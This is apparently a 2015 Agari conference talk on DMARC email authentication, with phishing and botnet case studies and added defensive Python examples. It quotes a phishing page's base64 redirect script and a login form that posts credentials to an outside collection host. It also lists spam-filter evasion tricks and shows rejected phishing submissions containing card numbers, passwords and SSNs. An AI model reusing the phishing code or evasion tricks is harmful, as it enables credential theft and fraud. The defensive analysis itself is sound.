DMARC: A Weapon for the Good Guys
April 10, 2015
© 2015 Agari

About your speaker: John Wilson

● Employee #4 at Agari
● Field CTO
● Managed JP Morgan Chase's implementation of DMARC
● Personally involved in the 2013 Citadel takedown effort
● Previous roles:
  - CTO of Brandmail Solutions, Concurro, and 365 Media
  - Director, Strategic Projects at SAP

About Agari

● DMARC pioneer with PayPal, Google & Yahoo!
● DMARC is the only open email standard to protect brands & consumers from fraud
● Founder & CEO Patrick Peterson built SenderBase at IronPort, the first email reputation service
● Engineering & Data Science team = deep security heritage (IronPort, Cisco, Proofpoint, FireEye…)

Agari secures email as a primary channel of digital engagement, eliminating brand abuse and consumer fraud.

Agenda

• The Road to DMARC
• Technical Overview of SPF, DKIM, and DMARC
• Practical Examples & War Stories
• Q & A

The Road to DMARC

Email has a Fundamental Flaw

Email Arms Race (defense -> attacker's evasion)

IP Reputation: SenderBase (Cisco), SenderScore (Return Path), Blacklists (SORBS, SpamHaus)
  -> Compromise a "Good" Server

Content Filtering:
  - words/word combinations -> Obfuscation ("Vi@gra", HTML)
  - virus scanning -> Modify binary until it isn't detected
  - URL scanning -> URL Shorteners, redirectors
  - Fingerprinting -> Varying subjects & content; Append random blocks of text

Spamtraps
  -> Use real addresses (captured in a breach, harvested from an address book)

October 5, 2007: The PayPal/Yahoo Experiment

Idea: Ask Yahoo to block non-authenticating paypal.com messages.

Challenge: How to ensure SPF and DomainKeys are properly configured and working as expected?

- Yahoo supported PayPal with metadata about all paypal.com email, including SPF/DK status
- PayPal used the data to perfect SPF/DK
- The experiment proved that blocking messages based on email authentication failures was highly effective at preventing exact-domain phishing

DMARC lets Everyone in on the Fun

● The DMARC standard adds enforceable policy and a feedback loop to SPF & DKIM to combat spoofed email, standardizing an effective solution at internet scale
● Email receivers have adopted DMARC – senders can leverage the standard to eliminate phishing, restore consumer trust and allow targeted tracking of abuse

(Figure: logos of DMARC receivers, DMARC participants and DMARC.org participants)

Technical Overview

SPF: Sender Policy Framework

SPF Record for apple.com:

- SPF authenticates the Envelope Domain
- SPF breaks when messages are relayed/auto-forwarded

DKIM: DomainKeys Identified Mail

DKIM is based on a cryptographic signature that is applied by the sending mail server. The signature is added as a special message header:

The signing domain and the "selector" are used by the receiving mail server to locate the public key record in DNS.

The public key is then used to verify the signature. If the signature verifies, we know that the signed headers and message body weren't modified after signing.
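As an added illustration (not code from the slides or from Agari) of how a receiver uses the signing domain and selector, the following Python parses a DKIM-Signature header, derives the DNS name of the public-key record and checks the bh= body hash. The domain, selector and message are constructed; the RSA verification of the b= tag over the canonicalized headers is not included.

```python
import base64
import hashlib

# Constructed sample body (not from the slides); trailing blank lines are deliberate.
BODY = "Hello,\r\n\r\nYour statement is ready.\r\n\r\n\r\n"

def canonicalize_body_simple(body: str) -> bytes:
    """RFC 6376 'simple' body canonicalization: drop trailing empty lines,
    then end the body with exactly one CRLF (an empty body becomes CRLF)."""
    data = body.encode()
    while data.endswith(b"\r\n\r\n"):
        data = data[:-2]
    if not data.endswith(b"\r\n"):
        data += b"\r\n"
    return data

def body_hash(body: str) -> str:
    """The value a signer places in the bh= tag (a=rsa-sha256 means SHA-256)."""
    return base64.b64encode(hashlib.sha256(canonicalize_body_simple(body)).digest()).decode()

def parse_dkim_signature(header_value: str) -> dict:
    """Split 'tag=value; tag=value' into a dict; folding whitespace inside values is removed."""
    tags = {}
    for part in header_value.split(";"):
        if "=" in part:
            k, v = part.split("=", 1)
            tags[k.strip()] = "".join(v.split())
    return tags

def key_record_name(tags: dict) -> str:
    """DNS TXT name the receiver queries for the public key: <selector>._domainkey.<domain>."""
    return f"{tags['s']}._domainkey.{tags['d']}"

def check_body_hash(tags: dict, body: str) -> bool:
    """True if bh= matches the body; a mismatch means the body changed after signing."""
    return body_hash(body) == tags.get("bh")

# Hypothetical header as a sending server would add it (domain/selector are assumptions).
# b= is a placeholder: checking it needs the RSA public key fetched from the DNS name above.
DKIM_SIGNATURE = (
    "v=1; a=rsa-sha256; c=relaxed/simple; d=example.com; s=sel2015; "
    "h=from:to:subject; bh=" + body_hash(BODY) + "; b=PLACEHOLDER"
)

if __name__ == "__main__":
    t = parse_dkim_signature(DKIM_SIGNATURE)
    print(key_record_name(t), check_body_hash(t, BODY))
```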

SPF:
- Authenticates Network Path
- Authorized servers via DNS
- Very low operational cost
- Envelope / From Header Alignment required

DKIM:
- Authenticates Message Header/Body
- Publish public keys in DNS
- Requires digital signature on each outbound message
- Signing / From Header Alignment required

DMARC Adds the Policy Layer to DKIM & SPF

Policy: Senders declare how to process unauthenticated email.
Visibility: Receivers provide feedback on messages failing authentication.

(Figure: DMARC layered on top of DKIM and SPF)

DMARC Record examples

Monitor policy example:

Quarantine policy example:

Reject policy example:

DMARC XML Aggregate Data Example

DMARC Forensic Feedback Example

Full Message Example (hotmail.com, outlook.com, etc.):

Typical DMARC Policy Enforcement Flow

From: [email protected]
To: [email protected]
Subject: Urgent Alert!

Do SPF or DKIM prove this message was sent by example.com?
  - Yes: Is the content OK?
  - No: What is example.com's DMARC policy? (e.g. none)
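The enforcement decision above, as an added Python example that is not the presentation's own code: the DMARC records, domains and SPF/DKIM results are constructed, and the organizational-domain lookup is a simplification (real receivers consult the Public Suffix List).

```python
# Evaluate a message the way the flow describes: an SPF or DKIM pass only counts
# when the authenticated domain aligns with the From header domain; otherwise
# the sender's published policy (p=/sp=) decides what the receiver does.

def parse_dmarc_record(txt: str) -> dict:
    """Parse a DMARC TXT record such as 'v=DMARC1; p=reject; rua=mailto:...'."""
    tags = {}
    for part in txt.split(";"):
        if "=" in part:
            k, v = part.split("=", 1)
            tags[k.strip().lower()] = v.strip()
    if tags.get("v") != "DMARC1" or "p" not in tags:
        raise ValueError("not a valid DMARC record")
    tags.setdefault("adkim", "r")      # relaxed alignment is the default
    tags.setdefault("aspf", "r")
    tags.setdefault("sp", tags["p"])   # subdomain policy defaults to p=
    return tags

def org_domain(domain: str) -> str:
    # Assumption: last two labels (a Public Suffix List lookup handles e.g. co.uk)
    return ".".join(domain.lower().split(".")[-2:])

def aligned(from_domain: str, auth_domain: str, mode: str) -> bool:
    """Strict ('s'): identical domains. Relaxed ('r'): same organizational domain."""
    if mode == "s":
        return from_domain.lower() == auth_domain.lower()
    return org_domain(from_domain) == org_domain(auth_domain)

def evaluate(from_domain, record, spf_result, envelope_domain, dkim_result, dkim_domain):
    """Return 'pass' when SPF or DKIM passes *and* aligns with the From domain,
    else the action the record requests: 'none' (monitor), 'quarantine' or 'reject'.
    Assumes the record was found at _dmarc.<organizational domain>."""
    rec = parse_dmarc_record(record)
    spf_ok = spf_result == "pass" and aligned(from_domain, envelope_domain, rec["aspf"])
    dkim_ok = dkim_result == "pass" and aligned(from_domain, dkim_domain, rec["adkim"])
    if spf_ok or dkim_ok:
        return "pass"
    # A From domain below the organizational domain falls under sp=
    return rec["p"] if from_domain.lower() == org_domain(from_domain) else rec["sp"]

# Constructed records mirroring the three policy types on the slides
MONITOR = "v=DMARC1; p=none; rua=mailto:dmarc-agg@example.com"
QUARANTINE = "v=DMARC1; p=quarantine; adkim=s; rua=mailto:dmarc-agg@example.com"
REJECT = "v=DMARC1; p=reject; sp=reject; ruf=mailto:dmarc-forensic@example.com"
```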

DMARC Policy Enforcement in Action

Limitations

- DMARC does not solve the "Friendly From" problem:
  From: PayPal Security <[email protected]
  - Inbox differentiation may help here
- If your mail provider doesn't support DMARC, the bad stuff still gets through
  - This is an ever-decreasing pool
  - Herd Immunity

Practical Examples & War Stories

Typical Phishing Campaign

DMARC Speeds Detection of Phishing Sites

Sophisticated Phish

<script type="text/javascript">
window.location.href = "data:text/html;charset=utf-8;base64,PCFET0NUWVBFIGh0bWwgUFVCTElDICItLy9XM0MvL0RURCBYSFRNTCAxLjAgVHJhbnNpdGlvbmFsLy9FTiIgImh0dHA6Ly93d3cudzMub3AgDQogICANCiAgICAgDQogICAgIA0KICAgDQoNCjxtZXRhIG5hbWU9ImtleXdvcmRzIiBjb250ZW50PSIiPg0KPG1ldGEgbmFtZT0iZGVzY3JpcHRpb24iIGNvbnRlbnQ9IiI… LOTS OF STUFF REMOVED …%3D"
</script>

The data: URI scheme is defined in RFC 2397.

Sophisticated Phish

<form id="frmLogin" name="frmLogin" method="post" action="http://e549a200372db9f3fcfac9f384e4ac2d.verifyinfo.net/end.php" class="validationName:(login) validate:()" autocomplete="off" enctype="application/x-www-form-urlencoded">

The host collecting the phished data is e549a200372db9f3fcfac9f384e4ac2d.verifyinfo.net.

But… you can't simply scan the email to find the phishing site. The end.php script didn't contain any branding, so an automated scan wouldn't necessarily detect it as a phishing site.
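An added Python example (not from the slides) of the analysis an abuse team has to do on the two snippets above: decode the base64 data: URI that the script loads, then pull the form action host out of the decoded HTML. The wrapper page and the collection host abc123.collector.example.net are constructed.

```python
import base64
import re
from urllib.parse import urlparse, unquote

# Constructed page in the style of the slides' sample: a script replaces the page
# with a base64 data: URI whose decoded HTML posts the login form to a
# hypothetical collection host. Nothing here is the real phishing page.
INNER_HTML = (
    '<html><body><form id="frmLogin" method="post" '
    'action="http://abc123.collector.example.net/end.php" autocomplete="off">'
    '<input name="user"><input name="pass" type="password"></form></body></html>'
)
WRAPPER = (
    '<script type="text/javascript">\n'
    'window.location.href = "data:text/html;charset=utf-8;base64,'
    + base64.b64encode(INNER_HTML.encode()).decode() + '";\n</script>'
)

# data:[<mediatype>][;param...],<payload>  (RFC 2397); payload may be percent-encoded
DATA_URI_RE = re.compile(r'data:([\w/+.-]+)?((?:;[\w=-]+)*),([^"\']*)', re.I)
FORM_ACTION_RE = re.compile(r'<form\b[^>]*\baction\s*=\s*["\']([^"\']+)["\']', re.I)

def decode_data_uris(html: str) -> list:
    """Return the decoded payload of every data: URI found in the page."""
    out = []
    for m in DATA_URI_RE.finditer(html):
        params, payload = m.group(2), m.group(3)
        if ";base64" in params.lower():
            # b64decode discards whitespace, so line-wrapped payloads decode too
            out.append(base64.b64decode(unquote(payload)).decode("utf-8", "replace"))
        else:
            out.append(unquote(payload))
    return out

def form_action_hosts(html: str, depth: int = 3) -> set:
    """Hosts that any <form> posts to, following nested data: URIs up to `depth` layers."""
    hosts = {urlparse(a).hostname for a in FORM_ACTION_RE.findall(html)}
    if depth > 0:
        for inner in decode_data_uris(html):
            hosts |= form_action_hosts(inner, depth - 1)
    return {h for h in hosts if h}

if __name__ == "__main__":
    print(form_action_hosts(WRAPPER))
```

A scanner that only looks at the visible HTML sees no form at all, which is the point the slide makes.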

Would you like some malware with your phish?

At this point, the phishing page tried to download a malicious program posing as a Java update.

Detecting Yesterday's Threats Today!

Here's a sample message containing a malicious attachment posing as a voicemail message. The attack ran from 8am – 10am UTC on February 26th, 2015.

Here we see an email-based malware attack launched on February 26, 2015. On the 26th, VirusTotal showed a 0/57 detection rate!

This is my ESET signature update for February 27th, 2015, which now detects Win32/Dridex.K, the malware variant sent in the February 26th campaign. What a difference a day makes!

Case Study: A Global Logistics Company

On April 10 – 18, 2014, criminals attempted to use a global logistics company's domain to send a malicious email containing a malware attachment. The attack ran in 3 waves. Wave 1 used the same subject line, while waves 2 & 3 used different shipment numbers.

On April 10 – 18, criminals attempted to use ups.com to send a malicious email containing a malware attachment. The attack ran in 3 waves. Wave 1 used the same subject line, while waves 2 & 3 used different shipment numbers.

Wave 1: 50,120 hosts
Wave 2: 34,877 hosts
Wave 3: 29,670 hosts

Mapping the attack

(Figure: maps of sending hosts on April 10, April 14 and April 18)

Analysis Methodology

(Figure: sending nodes (N) traced back through a Relay to the Botnet)

Attack Host Overlap*

(Figure: Venn diagram of hosts seen in Wave 1, Wave 2 and Wave 3; region counts 2,996; 5,576; 2,100; 1,480; 18,860; 10,784; 11,618)

* Not including known relays

Detecting Infected Machines on your Network

Send them Packing

- 50-100M fraudulent messages daily
- Sent from t.co domain
- DMARC reject policy published March 13, 2013
- Abuse stopped completely 2 days later
- Twitter was able to redeploy dozens of resources

Nigerian eBay/PayPal scam foiled

Not the Sharpest Tool in the Shed

To: [email protected]
From: [email protected]
Subject: Form Submission
Disposition: REJECT
Source IP: 34.56.2.7
----------
fname: Joe
lname: Smith
cardn: 1432234202341232
pin: 2198
phone: 2125551523
addr1: 172 W. 48th St.
addr2: apt. 12
city: New York
state: NY
zip: 10036
email: [email protected]
username: jsmith74
password: colgateBS95
ssn: 034-21-9987

To: [email protected]
From: [email protected]
Subject: Form Submission
Disposition: REJECT
Source IP: 34.56.2.7
----------
fname: Samuel
lname: Burroughs
cardn: 1432872198722443
pin: 8871
phone: 7162321023
addr1: 41 Pullman Ave.
addr2:
city: Rochester
state: NY
zip: 14615
email: [email protected]
username: samthepianoman
password: 11fingers
ssn: 414-54-0082

To: [email protected]
From: [email protected]
Subject: Form Submission
Disposition: REJECT
Source IP: 34.56.2.7
----------
fname: Raj
lname: Venkatasubramanian
cardn: 1432399864365132
pin: 3388
phone: 4089761023
addr1: 341 Kenmore Avenue
addr2:
city: Sunnyvale
state: CA
zip: 94086
email: [email protected]
username: rvenkat88
password: #shilpa$
ssn: 997-29-2101

14,000+ Total Submissions
~ 80% appeared to be real credentials

1. DMARC prevented delivery to the criminal
2. We knew the criminal's email address
3. We knew the gullible bank clients

Herd Immunity?

NY BBB Malware Campaign

Win32/TrojanDownloader.Waski.F trojan

Attack was blocked by DMARC

Twitter Account Takedowns

The Value of a Twitter Account

Using Twitter to Market an Illegal Pharmacy

(Figure: criminal account promoting http://t.co/4UFzs4Tf07)

DMARC Forensic Reporting

Threat Spike Alert

Agari Sends t.co URLs to Twitter Abuse Team

(Figure: 1,600 URLs handed to the Twitter Abuse Team)

Twitter Investigates (And Takes Action!)

1. Which accounts created the batch of t.co URLs?
2. What IP addresses were used to create those accounts?
3. What other accounts were created from those IP addresses?
4. Twitter removes the 1,600 t.co URLs
5. Twitter kills more than 20K user accounts

Citadel Takedown

Citadel Botnet Takedown: Agari's Role

• Provided intelligence on Citadel root cause - phishing emails with malicious URLs using web exploits for Citadel malware installation
  – Data must be provided at Internet scale and in real-time
• Leveraged data on fraudulent email purporting to be from seven FS-ISAC members sent to ~1B consumer mailboxes
• Submitted data on 3,762,605 emails from 4 March – 19 April 2013 to Microsoft's Digital Crimes Unit for analysis – 40% phish, 60% malware (Source: Microsoft)

Malicious Message Example 1

Malicious Message Example 2

Data Flow: From Spam to Intelligence

1. Criminals send spoofed messages purporting to be from FS-ISAC members.
2. Receivers send forensic copies of the spoofed messages to Agari for analysis.
3. Agari sends forensic analysis to the Microsoft DCU for further analysis and correlation with additional data.

Filtering for Relevant Information

1. Filter for messages based on member domain, header information, authentication fails, server origination.
2. Find matching messages, extract URLs, validate owned & safe URLs, create tuples for the remaining URLs.
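The two filtering steps above, written out as an added Python example (not Agari's pipeline): the forensic records, member domains and URLs are all constructed, and each record stands for one forensic copy a receiver forwarded.

```python
import re
from urllib.parse import urlparse

# Hypothetical FS-ISAC member domains and the hosts they are known to own
MEMBER_DOMAINS = {"bank-one.example", "credit-two.example"}
MEMBER_OWNED_HOSTS = {"www.bank-one.example", "secure.bank-one.example", "www.credit-two.example"}

# Constructed forensic records: claimed From domain, DMARC result, sending IP, body
RECORDS = [
    {"from_domain": "bank-one.example", "dmarc": "fail", "source_ip": "203.0.113.5",
     "body": "Verify your account at http://bank-one-secure.example.net/verify.php now"},
    {"from_domain": "bank-one.example", "dmarc": "pass", "source_ip": "198.51.100.9",
     "body": "Your statement: https://secure.bank-one.example/statements"},
    {"from_domain": "other-brand.example", "dmarc": "fail", "source_ip": "203.0.113.7",
     "body": "Click http://evil.example.org/x"},
    {"from_domain": "credit-two.example", "dmarc": "fail", "source_ip": "203.0.113.5",
     "body": "Login http://www.credit-two.example/ or http://203.0.113.40/login.php?id=1"},
]
URL_RE = re.compile(r"https?://[^\s<>\"']+")

def is_member_owned(url: str) -> bool:
    """Owned & safe: host is a member domain, one of its subdomains, or a known member host.
    A lookalike such as bank-one-secure.example.net is deliberately not matched."""
    host = (urlparse(url).hostname or "").lower()
    return host in MEMBER_OWNED_HOSTS or any(
        host == d or host.endswith("." + d) for d in MEMBER_DOMAINS)

def relevant(rec: dict) -> bool:
    """Step 1: keep messages that claim a member domain and failed authentication."""
    return rec["from_domain"].lower() in MEMBER_DOMAINS and rec["dmarc"] == "fail"

def url_tuples(records: list) -> list:
    """Step 2: extract URLs from relevant messages, drop the member's own URLs,
    and emit (source_ip, spoofed_domain, url) tuples for what remains."""
    tuples = []
    for rec in records:
        if not relevant(rec):
            continue
        for url in URL_RE.findall(rec["body"]):
            if not is_member_owned(url):
                tuples.append((rec["source_ip"], rec["from_domain"], url))
    return tuples

if __name__ == "__main__":
    for t in url_tuples(RECORDS):
        print(t)
```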

Map Showing a Single Day's Worth of Data

22,245 sources of spoofed messages purporting to be from participating FS-ISAC member domains, April 6, 2013

Agari Supported Microsoft as a Declarant

• Agari provided a declaration in support of the TRO, Seizure Order, and Order to Show Cause

Resources

John Wilson (Happy to answer questions, present to your team, etc.)
[email protected]

Agari (Free DMARC resources)
http://agari.com/tools/

DMARC.org (You can find the specification here!)
http://www.dmarc.org

Q & A

Thank You!

Backup Slides

DMARC Receivers

Provider                                          | Mailboxes   | Data | Enforcement | Msg Level
--------------------------------------------------|-------------|------|-------------|----------
Yahoo!                                            | 320 Million | ✔    | ✔           | ✔*
AT&T (via Yahoo)                                  | 8 Million   | ✔    | ✔           | ✔*
Rogers Communications (via Yahoo)                 | 10 Million  | ✔    | ✔           | ✔*
Verizon (via Yahoo)                               | 6 Million   | ✔    | ✔           | ✔*
Xtra, SBC, Ameritech, and additional Y! partners  | 20 Million  | ✔    | ✔           | ✔*
Google (Including 4.6M Apps Domains)              | 425 Million | ✔    | ✔           | soon?
Microsoft (Hotmail, Live.com, Outlook.com, MSN)   | 380 Million | ✔    | ✔           | ✔
AOL                                               | 50 Million  | ✔    | ✔           | 2014
Comcast                                           | 20 Million  | ✔    | ✔           |
NetEase (163.com, 126.com, yeah.net)              | 510 Million | ✔    | ✔           | ✔**
xs4all.nl                                         | 1 Million   | ✔    | ✔           |
Mail.ru                                           | 300 Million | ✔    | ✔           |
Yandex                                            | 200 Million | ✔    |             |
LinkedIn                                          | -           | ✔    | ✔           | ✔
Facebook                                          | 800 Million | ✔    |             |
iCloud                                            | ?           | 2015 | 2015        |
Mercury.net (including 177 customer domains)      | ?           | ✔    |             |

* URLs only; via private channel
** Full body available upon request

Soon you too can be a DMARC Receiver!

Open Source                      | Status
---------------------------------|------------
Sendmail (via OpenDMARC)         | production
Postfix (via OpenDMARC)          | production

Commercial                       | Status
---------------------------------|------------
Google Apps                      | production
Cisco/IronPort                   | production
Proofpoint                       | Summer 2015
Microsoft Office 365             | Spring 2015
Symantec Cloud                   | production
Message Systems (via OpenDMARC)  | production